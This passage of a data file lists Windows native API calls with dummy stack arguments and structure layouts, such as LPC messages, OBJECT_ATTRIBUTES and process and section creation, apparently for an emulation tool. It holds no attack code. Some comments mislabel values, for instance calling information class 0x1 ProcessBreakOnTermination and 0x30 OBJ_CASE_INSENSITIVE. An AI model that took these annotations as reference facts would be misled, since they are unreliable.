\"0x0020\",\r\n \"fieldComment\": \"Total length including header\"\r\n },\r\n {\r\n \"fieldName\": \"Type\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0002\",\r\n \"fieldComment\": \"Message type (e.g., LPC_REPLY)\"\r\n },\r\n {\r\n \"fieldName\": \"DataInfoOffset\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0008\",\r\n \"fieldComment\": \"Offset to data info\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId\",\r\n \"fieldType\": \"CLIENT_ID\",\r\n \"fieldValue\": \"0xbadd00d0\",\r\n \"fieldComment\": \"Pointer to CLIENT_ID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"MessageId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000005\",\r\n \"fieldComment\": \"Message identifier\"\r\n },\r\n {\r\n \"fieldName\": \"SectionSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Unused in this example\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtRequestPort\": {\r\n \"ntFunc\": \"NtRequestPort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to LPC_MESSAGE Request (dummy pointer)\",\r\n \"structurePointer\": \"LPC_MESSAGE\",\r\n \"structureRef\": \"struct207\",\r\n \"structureValueExpectations\": \"Message header and data fields for the request.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000448\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct207\": {\r\n \"type\": \"LPC_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"DataLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Length of data in message (32 bytes)\"\r\n },\r\n {\r\n \"fieldName\": \"TotalLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0030\",\r\n \"fieldComment\": \"Total length including header\"\r\n },\r\n {\r\n \"fieldName\": \"Type\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0001\",\r\n \"fieldComment\": \"Message type (e.g., LPC_REQUEST)\"\r\n },\r\n {\r\n \"fieldName\": \"DataInfoOffset\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Offset to data info\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId\",\r\n \"fieldType\": \"CLIENT_ID\",\r\n \"fieldValue\": \"0xbadd00e0\",\r\n \"fieldComment\": \"Pointer to CLIENT_ID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"MessageId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000006\",\r\n \"fieldComment\": \"Message identifier\"\r\n },\r\n {\r\n \"fieldName\": \"SectionSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Unused in this example\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtRequestWaitReplyPort\": {\r\n \"ntFunc\": \"NtRequestWaitReplyPort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to LPC_MESSAGE IncomingReply (dummy pointer, commonly None for no reply expected)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to LPC_MESSAGE Request (dummy pointer, typically points to a valid LPC_MESSAGE structure)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtWriteRequestData\": {\r\n \"ntFunc\": \"NtWriteRequestData\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to ULONG ResultLength (dummy pointer, may be None if not needed)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000020\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG Length (16 bytes, typical small message)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to buffer (dummy pointer, points to data to write)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xdeadbeef\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG DataIndex (0 for first data entry)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to LPC_MESSAGE Request (dummy pointer, typically points to a valid LPC_MESSAGE structure)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateProcess\": {\r\n \"ntFunc\": \"NtCreateProcess\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE ExceptionPort (None, not used in most cases)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE DebugPort (None, not used in most cases)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE SectionHandle (None, process will not be based on a section)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN InheritObjectTable (TRUE, inherit handle table from parent)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ParentProcess (dummy handle, typically a valid process handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer, commonly None for default attributes)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct208\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0FFF\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (PROCESS_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to HANDLE ProcessHandle (dummy pointer, receives new process handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct208\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (no name)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtFlushInstructionCache\": {\r\n \"ntFunc\": \"NtFlushInstructionCache\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG NumberOfBytesToFlush (4096 bytes, typical page size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00400000\",\r\n \"additionalComment\": \"PVOID BaseAddress (typical image base address)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtOpenProcess\": {\r\n \"ntFunc\": \"NtOpenProcess\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to CLIENT_ID (dummy pointer)\",\r\n \"structurePointer\": \"CLIENT_ID\",\r\n \"structureRef\": \"struct209\",\r\n \"structureValueExpectations\": \"UniqueProcess and UniqueThread identifiers.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer, commonly None for default attributes)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct210\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0FFF\",\r\n \"additionalComment\": \"ACCESS_MASK AccessMask (PROCESS_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to HANDLE ProcessHandle (dummy pointer, receives process handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct209\": {\r\n \"type\": \"CLIENT_ID\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"UniqueProcess\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x99995555\",\r\n \"fieldComment\": \"Dummy process identifier value\"\r\n },\r\n {\r\n \"fieldName\": \"UniqueThread\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None or unused example value\"\r\n }\r\n ]\r\n },\r\n \"struct210\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (no name)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryInformationProcess\": {\r\n \"ntFunc\": \"NtQueryInformationProcess\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ProcessInformationLength (16 bytes, typical for PROCESS_BASIC_INFORMATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to PROCESS_BASIC_INFORMATION (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ProcessInformationClass (ProcessBasicInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetInformationProcess\": {\r\n \"ntFunc\": \"NtSetInformationProcess\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000008\",\r\n \"additionalComment\": \"ProcessInformationLength (8 bytes, typical for setting a ULONG value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to process information buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ProcessInformationClass (ProcessBreakOnTermination)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtTerminateProcess\": {\r\n \"ntFunc\": \"NtTerminateProcess\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xC0000005\",\r\n \"additionalComment\": \"NTSTATUS ExitStatus (STATUS_ACCESS_VIOLATION as example)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlCreateUserProcess\": {\r\n \"ntFunc\": \"RtlCreateUserProcess\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to RTL_USER_PROCESS_INFORMATION (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE ExceptionPort (None, not used in most cases)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE DebugPort (None, not used in most cases)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN InheritHandles (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ParentProcess (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PSECURITY_DESCRIPTOR ThreadSecurityDescriptor (None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PSECURITY_DESCRIPTOR ProcessSecurityDescriptor (None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to RTL_USER_PROCESS_PARAMETERS (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0050\"\r\n },\r\n {\r\n \"value\": \"0x00000030\",\r\n \"additionalComment\": \"ULONG ObjectAttributes (OBJ_CASE_INSENSITIVE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING ImagePath (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct211\",\r\n \"structureValueExpectations\": \"Points to a UNICODE_STRING describing the image path.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct211\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Length in bytes of the string\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0040\",\r\n \"fieldComment\": \"Maximum length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0090\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCreateProfile\": {\r\n \"ntFunc\": \"NtCreateProfile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"KAFFINITY Affinity (CPU 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"KPROFILE_SOURCE ProfileSource (ProfileTime)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG BufferSize (4096 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to Buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG BucketSize (16 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00020000\",\r\n \"additionalComment\": \"ULONG ImageSize (128 KB)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00400000\",\r\n \"additionalComment\": \"PVOID ImageBase (typical PE base address)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE Process (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to HANDLE ProfileHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryIntervalProfile\": {\r\n \"ntFunc\": \"NtQueryIntervalProfile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to ULONG Interval (None, typical for querying only)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"KPROFILE_SOURCE ProfileSource (ProfileTime, common value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetIntervalProfile\": {\r\n \"ntFunc\": \"NtSetIntervalProfile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00002710\",\r\n \"additionalComment\": \"ULONG Interval (10,000, typical timer interval)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"KPROFILE_SOURCE Source (ProfileTime, common value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtStartProfile\": {\r\n \"ntFunc\": \"NtStartProfile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE ProfileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtStopProfile\": {\r\n \"ntFunc\": \"NtStopProfile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE ProfileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateSection\": {\r\n \"ntFunc\": \"NtCreateSection\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to HANDLE SectionHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x000F001F\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (SECTION_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer, commonly None for anonymous section)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct212\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER MaximumSize (dummy pointer, commonly used for section size)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct213\",\r\n \"structureValueExpectations\": \"QuadPart field specifying maximum section size.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000004\",\r\n \"additionalComment\": \"ULONG SectionPageProtection (PAGE_READWRITE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x08000000\",\r\n \"additionalComment\": \"ULONG AllocationAttributes (SEC_COMMIT)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE FileHandle (None, anonymous section)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct212\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (anonymous section)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n },\r\n \"struct213\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000010000000\",\r\n \"fieldComment\": \"256 MB section size\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtExtendSection\": {\r\n \"ntFunc\": 